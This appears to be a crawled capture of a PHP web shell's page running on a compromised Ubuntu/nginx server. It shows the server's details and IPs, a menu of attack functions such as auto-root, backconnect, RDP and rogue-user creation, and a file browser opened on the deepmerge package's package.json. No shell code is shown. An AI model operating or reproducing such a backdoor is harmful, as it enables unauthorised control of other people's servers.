Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
deepmerge /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
.editorconfig
113
B
-rw-rw-rw-
.eslintcache
382
B
-rw-rw-rw-
changelog.md
9.56
KB
-rw-rw-rw-
index.d.ts
823
B
-rw-rw-rw-
index.js
3.22
KB
-rw-rw-rw-
license.txt
1.09
KB
-rw-rw-rw-
package.json
1.13
KB
-rw-rw-rw-
readme.md
5.55
KB
-rw-rw-rw-
rollup.config.js
343
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "deepmerge", "description": "A library for deep (recursive) merging of Javascript objects", "keywords": [ "merge", "deep", "extend", "copy", "clone", "recursive" ], "version": "4.3.1", "homepage": "https://github.com/TehShrike/deepmerge", "repository": { "type": "git", "url": "git://github.com/TehShrike/deepmerge.git" }, "main": "dist/cjs.js", "engines": { "node": ">=0.10.0" }, "scripts": { "build": "rollup -c", "test": "npm run build && tape test/*.js && jsmd readme.md && npm run test:typescript", "test:typescript": "tsc --noEmit test/typescript.ts && ts-node test/typescript.ts", "size": "npm run build && uglifyjs --compress --mangle -- ./dist/umd.js | gzip -c | wc -c" }, "devDependencies": { "@types/node": "^8.10.54", "is-mergeable-object": "1.1.0", "is-plain-object": "^5.0.0", "jsmd": "^1.0.2", "rollup": "^1.23.1", "rollup-plugin-commonjs": "^10.1.0", "rollup-plugin-node-resolve": "^5.2.0", "tape": "^4.11.0", "ts-node": "7.0.1", "typescript": "=2.2.2", "uglify-js": "^3.6.1" }, "license": "MIT" }
Close